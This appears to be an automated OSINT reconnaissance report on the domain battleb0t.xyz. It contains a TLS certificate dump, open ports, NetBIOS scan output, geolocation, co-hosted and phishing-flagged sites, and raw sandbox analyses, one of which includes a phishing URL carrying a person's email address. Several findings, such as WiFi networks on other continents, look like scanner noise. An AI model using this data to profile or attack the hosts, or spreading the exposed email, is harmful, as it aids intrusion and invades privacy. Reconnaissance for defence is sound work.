Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:25:A0:69:FB:7F:3E:63:7D:A0:82:F0:BD:
99:FA:FF:84:20:AF:C5:86:81:24:4B:F7:CB:AB:FB:5E:
BD:6B:87:56:02:21:00:8A:56:44:28:2B:0B:E5:D6:3A:
F4:15:7E:0A:3C:BA:80:47:38:D3:13:65:D6:8E:A8:E5:
01:04:D3:ED:D7:28:24
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:48:50:77:27:A7:8D:E9:4E:44:5B:E4:B4:
56:50:FB:20:FC:C8:FD:0F:4B:DC:68:08:A4:56:A5:4B:
F5:A5:47:B3:02:20:41:B4:A0:0F:22:1C:69:E8:F3:FB:
60:B2:81:61:62:E0:DD:28:37:13:7E:74:2B:26:74:E1:
FD:E5:4D:29:61:E7
Signature Algorithm: sha256WithRSAEncryption
61:b4:ef:73:fc:3c:d6:36:f5:75:80:0c:33:8b:9a:05:0b:c4:
ef:72:1d:69:74:95:fd:0a:84:bd:b8:b9:3c:12:87:d3:eb:2d:
b5:d2:63:2a:29:60:59:c4:11:1c:0f:c3:fb:79:2f:8a:43:57:
38:62:d8:2e:68:34:bb:6c:0e:7a:e3:f8:3d:f5:c1:05:a5:6d:
93:b9:b3:48:22:8e:a3:39:66:e6:a5:9e:dc:e2:98:35:7e:b3:
e1:c7:b2:16:b7:b0:2e:70:50:4e:ea:93:d0:f8:5c:69:6c:1b:
d2:3e:ee:da:64:1f:ad:97:c8:be:17:38:a6:ed:92:9e:3b:db:
67:c8:b0:5f:e6:af:fd:f7:57:92:7b:87:3d:bf:c4:c1:21:13:
ba:c4:d8:85:a3:63:dc:90:ee:df:3d:2a:bc:03:4e:ba:1b:8c:
0c:16:7e:58:e3:ac:7f:dc:3b:40:18:1f:74:98:d5:c4:fa:32:
99:95:a0:64:1e:5b:4d:a8:f5:79:33:2e:3f:43:dc:8d:0e:7d:
28:25:74:7a:93:27:53:2e:6b:ae:4d:81:c1:3c:e0:cd:42:02:
6d:fc:da:f3:52:57:d5:b1:70:8e:1a:91:15:c8:1b:93:cd:40:
b8:ff:29:e7:c6:05:ad:63:8c:c8:ec:d7:e9:88:33:a3:5d:43:
a1:d5:b9:20
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | AUMWLAN (Net ID: 00:02:2D:1F:4C:85) | 50.1188, 8.6843 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3126416304 (Net ID: 00:01:03:7B:F5:4B) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Cracked (Category: social)
https://www.cracked.com/members/login | login |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2082 | 87.248.157.102 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.253): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:58:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://planningpokeronline.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xd2c_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n 
"Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab475D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab46BF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "6AFCP6RJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6AFCP6RJ.txt]- [targetUID: 00000000-00000484]\n Dropped file: "KYOQ4GIQ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KYOQ4GIQ.txt]- [targetUID: 00000000-00003456]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsplanningpokeronline.com" has type "HTML document UTF-8 Unicode text with very long 
lines with no line terminators"- [targetUID: N/A]\n "~DF57DB14006E50F0E5.TMP" has type "data"- Location: [%TEMP%\\~DF57DB14006E50F0E5.TMP]- [targetUID: 00000000-00000484]\n "Cab475D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab475D.tmp]- [targetUID: 00000000-00003456]\n "RecoveryStore._DE97F9DD-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003456]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFC805A7001878EE75.TMP" has type "data"- Location: [%TEMP%\\~DFC805A7001878EE75.TMP]- [targetUID: 00000000-00000484]\n "~DF74F4EB885327EEE5.TMP" has type "data"- Location: [%TEMP%\\~DF74F4EB885327EEE5.TMP]- [targetUID: 00000000-00000484]\n "6AFCP6RJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6AFCP6RJ.txt]- [targetUID: 00000000-00000484]\n "_DE97F9DF-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "Tar475E.tmp" has type "data"- Location: [%TEMP%\\Tar475E.tmp]- [targetUID: 00000000-00003456]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab46BF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" 
number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab46BF.tmp]- [targetUID: 00000000-00003456]\n "~DFA5F0ABB14A6E6D02.TMP" has type "data"- Location: [%TEMP%\\~DFA5F0ABB14A6E6D02.TMP]- [targetUID: 00000000-00000484]\n "_E9B6B1A0-7012-11ED-8A21-080027C90619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003456]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://planningpokeronline.com/"\n Pattern match: "https://planningpokeronline.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63865b7cd5844423476081fd', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'ee2b3005a67dc45a60a0bc2947c2bfd8584632d9366ff2363f99250eefc18ee6', u'sha512': 
u'30cd14ddec6b724ae48ed2a119893fc317f3712fbf68421011c0f821b530e5f010a45a9278791619284396b908268be95648fb2255dd7077f478e9c1512bb886', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://planningpokeronline.com/', u'submission_id': u'63865b7cd5844423476081fe', u'created_at': u'2022-11-29T19:20:28+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-29T19:20:28+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'28f8b4c39853b6bc34686712011e8493', u'network_mode': u'default', u'processes': [], u'sha1': u'f1fdac605e322d6ca2a758956f47506607dad35c', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000000014286.github.io]
https://www.openphish.com/feed.txt | 000000014286.github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | villagio (Net ID: 00:01:24:F0:87:66) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 188.114.97.1 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5c5df87c1e1957-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:C6:10:31) | 39.0469, -77.4903 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo07501 (Net ID: 00:0C:F6:5C:1D:4D) | 50.8897, 6.0563 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 003marek.github.io |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-25 03:02:52 | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Naver (Category: social)
https://blog.naver.com/login | login |
| 2023-05-12 02:46:02 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 35.229.48.116 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_2.jpeg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:36:07 | Open UDP Port Information | No | Tool - nbtscan | 0 | 0 | 4 | 0 | None | NetBIOS Name Table for Host 45.131.109.53:
Incomplete packet, 155 bytes long.
Name Service Type
----------------------------------------
70724-04381 <20> UNIQUE
70724-04381 <00> UNIQUE
WORKGROUP <00> GROUP
Adapter address: c4:37:72:0f:5e:ba
| 45.131.109.53:137 |
| 2023-05-12 02:46:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://github.com/facebook/regenerator/blob/main/license', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 29, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6876:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6876:120:WilError_01"\n "SM0:5744:120:WilError_01"\n "Local\\SM0:5744:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:5744:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:6876:304:WilStaging_02"\n "SM0:6876:120:WilError_01"\n "SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6876:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.43.150:443"\n "172.67.212.13:443"\n 
"35.186.254.174:443"\n "104.18.11.207:443"\n "142.251.46.228:443"\n "172.67.71.45:443"\n "142.250.189.227:443"\n "172.217.164.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "dev.protektnet.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_869169848\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00006876]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_869169848\\json\\i18n-shared-components\\ja\\strings.json]- 
[targetUID: 00000000-00006876]\n "a8ce5196df51c32c_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\a8ce5196df51c32c_0]- [targetUID: 00000000-00006876]\n "Session_13323203029743627" has type "data"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006876]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007564]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006876]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\manifest.fingerprint]- [targetUID: 00000000-00006876]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007564]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Part-IT" has type "data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping6876_1661340083\\Part-IT]- [targetUID: 00000000-00006876]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006876]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- 
[targetUID: 00000000-00006876]\n "2aab480a-d616-460d-a587-6a093b98b3e9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\2aab480a-d616-460d-a587-6a093b98b3e9.tmp]- [targetUID: 00000000-00006876]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fapollomech.com%2Fsara.selle%40apollomech.com"\n Pattern match: "https://github.com/facebook/regenerator/blob/main/LICENSE"\n Heuristic match: "1000logos.net"\n Pattern match: "https://track.salesflare.com/flare.js"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "dev.protektnet.com"\n Pattern match: "https://dev.protektnet.com/MNU/site.php"\n Pattern match: "https://llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/css/main.64d85253.css,static_js_url:https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/js/main.f389f055.js,static_version:53},edge_reward"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: 
"https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 172.67.212.13"\n "UDP connection to 142.251.46.228"\n "UDP connection to 142.250.189.227"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.43"\n Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.43\\LICENSE"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"'}], u'threat_level': 0, u'size': None, u'job_id': u'640f5f84dbc6ba518703abfa', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], 
u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', | 185.199.111.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.111.153 |
